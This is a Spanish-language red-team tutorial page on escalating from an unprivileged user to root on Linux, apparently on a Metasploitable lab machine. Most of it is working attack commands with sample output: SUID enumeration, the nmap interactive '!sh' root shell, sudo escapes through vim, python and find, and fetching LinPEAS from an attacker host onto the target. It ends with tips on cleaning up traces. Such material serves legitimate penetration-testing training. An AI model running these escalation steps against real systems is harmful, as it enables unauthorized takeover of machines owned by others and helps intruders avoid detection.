Descifrando datos operativos
Descifrando datos operativos
Red Team — Plano de Ataque // 04
De usuario normal a root en Linux
Conseguiste acceso como usuario sin privilegios. El trabajo real empieza aquí. La escalación convierte un acceso limitado en control total. En este PlayBook vas a aprender los vectores más comunes usando las mismas técnicas del OSCP.
Objetivo de este Protocolo
Al terminar vas a poder enumerar vectores de privesc en Linux, explotar binarios SUID mal configurados, abusar de permisos sudo y entender cómo cerrar estos vectores.
Lo primero al ganar acceso: entender el entorno. Quién eres, qué permisos tienes, qué versión del sistema corre.
# ¿Quién soy?
whoami && id
# ¿Qué sistema es este?
uname -a && cat /etc/os-release
# ¿Qué usuarios tienen shell?
cat /etc/passwd | grep "/bin/bash"
# ¿Qué puedo ejecutar como sudo?
sudo -luid=1001(msfadmin) gid=1001(msfadmin)
Linux metasploitable 2.6.24-16-server
User msfadmin may run the following commands:
(ALL) ALL"(ALL) ALL" en sudo -l significa que este usuario puede ejecutar CUALQUIER comando como root. En un sistema mal configurado esto termina el juego en un paso.
Los binarios con bit SUID se ejecutan con permisos del dueño (root) sin importar quién los ejecuta. Una misconfiguration aquí = root inmediato.
# Busca todos los SUID en el sistema:
find / -perm -u=s -type f 2>/dev/null
# Filtra los interesantes:
find / -perm -u=s -type f 2>/dev/null | grep -v "^/proc"/usr/bin/passwd
/usr/bin/sudo
/usr/bin/nmap
/usr/bin/vim
/bin/ping
/bin/sunmap con SUID es explotable. vim también. GTFOBins (gtfobins.github.io) tiene el exploit específico para cada binario — búscalo siempre.
Nmap tiene un modo interactivo que permite ejecutar comandos del sistema. Con SUID, esos comandos corren como root.
# Verifica que nmap tiene SUID:
ls -la /usr/bin/nmap
# Entra al modo interactivo:
nmap --interactive
# Dentro del modo interactivo:
nmap> !sh
# Ahora tienes shell como root:
whoami-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
Starting Nmap V. 4.53
Welcome to Interactive Mode
nmap> !sh
sh-3.2# whoami
rootUna sola línea y tienes root. Funciona en versiones antiguas de nmap (< 5.21). GTFOBins tiene técnicas similares para decenas de binarios comunes.
Si puedes ejecutar ciertos comandos con sudo, a veces esos comandos permiten escalar a root aunque no sea la intención.
# Revisa sudo -l y busca en GTFOBins cada binario
# Si puedes ejecutar vim como sudo:
sudo vim -c ':!/bin/bash'
# Si puedes ejecutar python:
sudo python3 -c 'import pty; pty.spawn("/bin/bash")'
# Si puedes ejecutar find:
sudo find / -exec /bin/bash \; -quitGTFOBins (gtfobins.github.io) tiene el método de escalación para cada binario que aparece en sudo -l. Es la referencia que todo pentester usa.
LinPEAS automatiza la búsqueda de vectores de privesc. Muestra resultados en colores: rojo = crítico.
# Descarga en Kali:
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
# Levanta servidor HTTP en Kali:
python3 -m http.server 8080
# En la máquina objetivo:
wget http://TU_IP_KALI:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh 2>/dev/null | tee /tmp/output.txt╔══════════╣ SUID - Check easy privesc
-rwsr-xr-x 1 root root nmap
-rwsr-xr-x 1 root root vim
[+] Files with SUID bit — POSSIBLE PRIVESCTodo lo que LinPEAS marca en rojo es un vector potencial. Busca cada uno en GTFOBins o HackTricks para el exploit específico.
LinPEAS genera ruido en los logs. En pentest real considera enumeración manual primero.
El abuso de SUID y sudo es local al sistema — no requiere contacto con internet.
Limpia los archivos que dejas: linpeas.sh y outputs temporales.
En sistemas con auditd activo cada comando sudo queda logueado.